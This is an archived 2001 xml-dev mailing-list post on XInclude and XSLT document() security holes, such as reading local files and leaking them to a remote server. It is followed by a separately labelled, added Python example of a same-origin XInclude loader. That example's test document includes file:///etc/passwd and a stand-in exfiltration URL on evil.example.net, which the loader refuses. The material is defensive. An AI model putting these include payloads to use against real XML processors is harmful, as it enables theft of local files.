OASIS Mailing List Archives

   Re: [xml-dev] XInclude: security risk 1


>On reflection, I think XInclude's security issues are really just a
>subset of those that browsers have with XSLT, or at least are solvable
>in the same way.  XSLT allows you to fetch data from a local file
>using document("file:///whatever") and even allows you to pass out
>that information as part of a URL in another document() call.

You're right. That does sound like another security hole, and 
possibly worse. It also had not occurred to me that you might 
XInclude a file URL. That opens up some more holes.

>I checked what Mozilla does in this case, and it appears to refuse
>to fetch a file: URL from a document() call in a remote stylesheet.

Which raises the questions:

1. What does IE6 do?
2. What does Mozilla do when faced with an http URL in the document() 
function that points to a host other than the document base?

The XSLT issue is potentially worse because you could use XSLT to 
actually include the contents of the stolen XML document in the URL 
you passed back to the hacker's server. It is somewhat (though far 
from completely) mitigated by the fact that the document() function 
can only point to well-formed XML documents so it can't steal 
absolutely any file or URL.

| Elliotte Rusty Harold | elharo@metalab.unc.edu | Writer/Programmer |
|          XML in a  Nutshell, 2nd Edition (O'Reilly, 2002)          |
|              http://www.cafeconleche.org/books/xian2/              |
|  http://www.amazon.com/exec/obidos/ISBN%3D0596002920/cafeaulaitA/  |
|  Read Cafe au Lait for Java News:  http://www.cafeaulait.org/      |
|  Read Cafe con Leche for XML News: http://www.cafeconleche.org/    |
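The check the thread is circling, that a processor should refuse a file: href (and, per question 2, a cross-host http href) when the including document itself arrived over the network, written out as an added example against Python's standard-library XInclude processor. This is not code from the original post, from Mozilla, or from any shipping XInclude implementation; the document URL, the two sample documents and the in-memory stand-in for the network are constructed for the example. The same policy placed in a URI resolver would cover document() in an XSLT processor, but this example handles XInclude only.

```python
"""Added example: a same-origin loader for xml.etree.ElementInclude.

Every xi:include href is resolved against the URL the including document
was fetched from; anything whose scheme or host differs (file:///..., or
http://other-host/...) is refused before any fetch happens.
"""
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude
from urllib.parse import urljoin, urlsplit

# Constructed for the example: assume this document was served from DOC_URL.
DOC_URL = "http://example.com/report.xml"

# Constructed hostile document: a local file, a cross-host URL, and a
# legitimate relative include.
HOSTILE_DOC = b"""<?xml version="1.0"?>
<report xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include href="file:///etc/passwd" parse="text"/>
  <xi:include href="http://evil.example.net/collect?d=secret"/>
  <xi:include href="part.xml"/>
</report>"""

# Constructed benign document: both includes stay on the document's origin.
SAFE_DOC = b"""<?xml version="1.0"?>
<report xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include href="part.xml"/>
  <xi:include href="//example.com/footer.xml"/>
</report>"""

# Constructed stand-in for the network: absolute URL -> bytes a server returns.
FAKE_NETWORK = {
    "http://example.com/part.xml": b"<part>body</part>",
    "http://example.com/footer.xml": b"<footer>end</footer>",
    "http://evil.example.net/collect?d=secret": b"<ok/>",
}


def fake_fetch(url):
    """Offline replacement for an HTTP GET; unknown URLs raise KeyError."""
    return FAKE_NETWORK[url]


class IncludeDenied(Exception):
    """Raised when an xi:include points outside the including document's origin."""


def same_origin(doc_url, href):
    """True if href, resolved against doc_url, keeps the same scheme and host.

    file: URLs have scheme 'file', so they never match an http(s) document;
    protocol-relative hrefs (//host/path) inherit the document's scheme.
    """
    base = urlsplit(doc_url)
    target = urlsplit(urljoin(doc_url, href))
    return (target.scheme.lower() == base.scheme.lower()
            and target.netloc.lower() == base.netloc.lower())


def make_same_origin_loader(doc_url, fetch):
    """Build an ElementInclude loader that enforces the same-origin rule.

    The loader signature (href, parse, encoding=None) is what
    ElementInclude.include expects; fetch(absolute_url) -> bytes is the
    caller's actual network access.
    """
    def loader(href, parse, encoding=None):
        url = urljoin(doc_url, href)
        if not same_origin(doc_url, href):
            raise IncludeDenied("refusing to include %s from document %s"
                                % (url, doc_url))
        data = fetch(url)
        if parse == "xml":
            return ET.fromstring(data)
        return data.decode(encoding or "utf-8")
    return loader


def include_same_origin(doc_url, xml_bytes, fetch):
    """Parse xml_bytes (served from doc_url) and expand its XIncludes.

    Fails closed: the first out-of-origin include aborts the whole expansion
    instead of returning a partially expanded document.
    """
    root = ET.fromstring(xml_bytes)
    ElementInclude.include(root, loader=make_same_origin_loader(doc_url, fetch))
    return root


def expand_or_report(doc_url, xml_bytes, fetch):
    """Return (root, None) on success or (None, reason) when an include is denied."""
    try:
        return include_same_origin(doc_url, xml_bytes, fetch), None
    except IncludeDenied as exc:
        return None, str(exc)


if __name__ == "__main__":
    for name, doc in (("hostile", HOSTILE_DOC), ("safe", SAFE_DOC)):
        root, reason = expand_or_report(DOC_URL, doc, fake_fetch)
        if root is None:
            print(name, "-> denied:", reason)
        else:
            print(name, "->", ET.tostring(root).decode())
```

Note that the rule is applied to the href as resolved against the document's own URL, so a relative href like "/etc/passwd" resolves to http://example.com/etc/passwd and is allowed (it is the server's resource, not the client's), while "file:///etc/passwd" is refused regardless of how it is spelled. Refusing cross-host http hrefs is the conservative answer to question 2; a processor that wanted to allow them would still need to keep file: out.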



Copyright 2001 XML.org. This site is hosted by OASIS